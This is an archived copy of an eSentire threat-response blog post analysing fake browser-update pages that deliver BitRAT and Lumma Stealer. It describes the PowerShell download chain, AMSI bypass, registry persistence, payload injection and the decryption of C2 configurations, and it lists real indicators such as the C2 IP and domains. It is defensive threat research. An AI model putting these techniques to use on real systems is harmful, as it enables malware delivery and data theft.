{ "id": "ccaec3ca-b8bd-4c87-9efd-4c3ea3cb8cc6", "created_at": "2026-04-06T00:21:50.895022Z", "updated_at": "2026-04-10T03:20:54.837406Z", "deleted_at": null, "sha1_hash": "08b9e61d3fae4e7f57e721bc3988699021bffedb", "title": "Fake Browser Updates delivering BitRAT and Lumma Stealer", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1427913, "plain_text": "Fake Browser Updates delivering BitRAT and Lumma Stealer\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:01:39 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn May 2024, eSentire's Threat Response Unit (TRU) detected an instance of fake updates delivering BitRAT and\r\nLumma Stealer.\r\nFake browser updates have been responsible for numerous malware infections, including those of the well-known\r\nSocGholish malware. In April 2024, we observed FakeBat being distributed via similar fake update mechanisms.\r\nThe infection chain began when the user visited an infected webpage containing injected malicious JavaScript\r\ncode (Figure 1).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 1 of 10\n\nFigure 1: Fake Chrome update\r\nUpon loading the compromised page, the injected malicious JavaScript code is triggered, which directs the user to\r\nthe fake update page (Figure 2). After cleaning up the code, we found redirect code hidden within the JavaScript\r\n(Figure 3). The redirected site can only be accessed if the HTTP referrer matches the original malicious web page.\r\nFigure 2: Injected malicious JavaScript code\r\nFigure 3: Redirect site hidden within the JavaScript\r\nThe chatgpt-app[.]cloud site contains a download link to a Zip archive called ‘Update.zip’, which is automatically\r\ndownloaded onto the victim’s device. The archive is hosted on Discord’s Content Distribution Network (CDN)\r\n(Figure 4).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 2 of 10\n\nFigure 4: Download of Update.zip from Discord’s CDN\r\nFake Update\r\nThe fake browser update lure has become common amongst attackers as a means of entry to a device or network.\r\nThe JavaScript file (Update.js) contained within the ZIP archive acts as an initial downloader to retrieve the\r\npayloads once executed by the victim. The archive contains several PowerShell scripts responsible for\r\ndownloading and executing the next stage loader and payloads from http://77[.]221[.]151[.]31.\r\nIn the incident observed, there were multiple PowerShell scripts following the execution of Update.js, as seen in\r\nFigure 5 below:\r\nFigure 5: PowerShell script retrieving payload file\r\nThe IP address identified in the PowerShell script is a known BitRAT Command-and-Control (C2) address, which\r\nhosts both the BitRAT and Lumma Stealer payloads. The files have the extension .png, but contain the loader,\r\npersistence mechanisms, and the payloads.\r\nThere were four unique files identified in this attack, all of which serve different purposes:\r\ns.png – Loader + Lumma Stealer payload\r\nz.png – PowerShell script that creates runkey for persistence + downloads Loader + BitRAT payload\r\na.png – Loader + BitRAT payload\r\n0x.png – BitRAT persistence file that redownloads a.png and executes it\r\nStarting with z.png, the PowerShell script bypasses AMSI, renames the payload 0x.png to 0x.log, hides it in the\r\nC:\\Users\\Public directory, and sets it to run at startup by modifying the Registry Run Key. It also retrieves and\r\nexecutes a.png, the loader and BitRAT payload (Figure 6).\r\nFigure 6: z.png retrieving 0x.png and a.png\r\nThe 0x.log (0x.png) payload contains an additional PowerShell script which acts as a persistence mechanism for\r\nthe BitRAT payload file, a.png. The 0x.log file downloads a.png and executes it (Figure 7).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 3 of 10\n\nFigure 7: 0x.png downloads and executes a.png via PowerShell\r\nThe two files containing the malicious payloads a.png and s.png include an AMSI bypass, the code that leverages\r\nreflection in .NET to dynamically load and execute the payload within RegSvcs.exe process (Figure 8).\r\nFigure 8: Simplified version of a.png showing the AMSI bypass and loading\r\nLoader\r\nThere are two parts to the payload files, a.png and s.png – the loader portion and the payload. The loader\r\nmechanism appears to be almost the same in both files; the only difference seems to be the hash itself.\r\nThe loader is a .NET portable executable (PE) file, obfuscated using Crypto Obfuscator (5.x). The loader is tasked\r\nwith loading the decrypted payload binary from the files PowerShell script and injecting it into RegSvcs.exe\r\n(Figure 9).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 4 of 10\n\nFigure 9: The deobfuscated loader\r\nBitRAT\r\nBitRAT is a feature-rich remote access tool with capabilities such as two modes of connections (direct reverse\r\nconnection and Tor connection), UAC exploit for elevated privileges, process protection, and the ability to manage\r\nover 10,000 clients efficiently.\r\nIt offers a binder that binds up to 5 files, a remote browser feature supporting Chrome, password recovery for\r\nvarious applications, XMR miner for cryptocurrency mining, reverse proxy using SOCKS4 mode, remote desktop\r\naccess, webcam live feed, file manager with zip compression, keylogger functions, audio live feed, and SOCKS5\r\nproxy support.\r\nThe BitRAT sample analyzed in this case was UPX packed and contained an encrypted configuration. The\r\nconfiguration data is decrypted using the following steps:\r\n1. First, a decoded string is loaded to memory.\r\n2. A second string is loaded to memory to which the first string is appended.\r\n3. The CRC-32 hash is generated for the string to which 8 is added.\r\n4. An MD5 hash is generated from the lowercase version of the previously generated hash.\r\n5. The first 16 characters from the MD5 hash are utilized as the key for the Camellia decryption routine.\r\n6. The decryption routine with the same key is used for decryption of every encrypted string in the binary.\r\nThe decrypted configuration:\r\nHost: 77.221.151[.]31\r\nPort: 4444\r\nTor Process Name: Tor\r\nInstall Directory: 0\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 5 of 10\n\nInstall File: 0\r\nPassword: 7b13ff385b95cf25d53088d6b7c5d890\r\nLumma Stealer\r\nLumma Stealer, also known as LummaC2 Stealer, is an information stealing malware developed in C language. It\r\nhas been operating as a Malware-as-a-Service in Russian-speaking forums since August 2022. Created by the\r\nthreat actor \"Shamel\" using the alias \"Lumma\", this malware targets cryptocurrency wallets, 2FA browser\r\nextensions, and other sensitive data on victims' machines.\r\nThe stolen data is sent to a C2 server via HTTP POST requests with the user agent beginning with \"Mozilla/5.0\".\r\nAdditionally, Lumma Stealer includes a non-resident loader capable of deploying further malicious payloads in\r\nEXE, DLL, and PowerShell formats.\r\nThis article will focus solely on the major sections of Lumma Stealer, as eSentire has previously covered it in\r\ndetail.\r\nThere are notable strings found in Lumma Stealer’s C2 communication, including the version and Lumma ID\r\n(lid), also referred to as the build ID, which uniquely identifies Lumma (Figure 10).\r\nFigure 10: Notable strings in Lumma Stealer Payload\r\nThe payload includes the user-agent used by the malware (Figure 11).\r\nFigure 11: User-agent field found in malware config\r\nAnother parameter, \"act,\" reveals that it has been initialized with the value “life,” used to check-in with the C2\r\n(Figure 12).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 6 of 10\n\nFigure 12: C2 check-in string\r\nThe sample contains 9 embedded domains used for C2 communications, seen as base64 encoded strings in Figure\r\n13, left. During runtime, the C2 domains are extracted using the routine shown in Figure 13 and described below.\r\nFigure 13: Encrypted C2 Strings (left) Decryption Routine (right)\r\nThe C2 domain list decryption function is outlined as follows:\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 7 of 10\n\n1. First, a base64 string from the above is loaded into memory.\r\n2. This string then undergoes a base64 decode operation and the resulting bytes are stored in a buffer.\r\n3. The key is present at an offset 0x20 from the start of the previous buffer.\r\n4. This key is then used to XOR the buffer which reveals the C2 domains.\r\nWe have released a script that performs these operations for the above strings and produces the C2 domains,\r\nwhich is available here.\r\nThe decrypted configuration includes the following C2 domains:\r\ndemonstationfukewko[.]shop\r\nliabilitynighstjsko[.]shop\r\nalcojoldwograpciw[.]shop\r\nincredibleextedwj[.]shop\r\nshortsvelventysjo[.]shop\r\nshatterbreathepsw[.]shop\r\ntolerateilusidjukl[.]shop\r\nproductivelookewr[.]shop\r\naccountasifkwosov[.]shop\r\nThe use of fake updates to deliver a variety of malware displays the operator's ability to leverage trusted names to\r\nmaximize reach and impact. The .NET loader being the same in both payload files shows the likelihood of the\r\nfake update loader being a malware delivery service. The malware payload is likely interchangeable and will\r\nresult in a variety of different types being loaded in similar incidents in the future.\r\nWhat did we do?\r\nOur 24/7 SOC Cyber Analysts investigated the suspicious activities, notified the client, and isolated the affected\r\ndevice.\r\nWhat can you learn from this TRU Positive?\r\nFake browser update campaigns use sophisticated social engineering tactics by mimicking legitimate\r\nbrowser update prompts that match the user's browser type and language.\r\nThis targeted approach indicates the need for increased user awareness about the authenticity of\r\nupdate notifications and the sources from which updates are downloaded.\r\nBitRAT and Lumma Stealer were the final payloads during this incident, although it is likely other malware\r\nmay be loaded in future deliveries.\r\nThese final payloads allow attackers to perform reconnaissance, steal sensitive data, and provide\r\nremote access to the infected host.\r\nRecommendations from our Threat Response Unit (TRU):\r\nEnsure that all endpoints are protected with up-to-date antivirus software or Endpoint Detection and\r\nResponse (EDR) tool capable of detecting and blocking malicious files\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 8 of 10\n\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your\r\nemployees on emerging threats in the threat landscape.\r\nIndicators of Compromise\r\nYou can access the indicators of compromise here.\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nGET STARTED\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 9 of 10\n\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer" ], "report_names": [ "fake-browser-updates-delivering-bitrat-and-lumma-stealer" ], "threat_actors": [], "ts_created_at": 1775434910, "ts_updated_at": 1775791254, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.pdf", "text": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.txt", "img": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.jpg" } }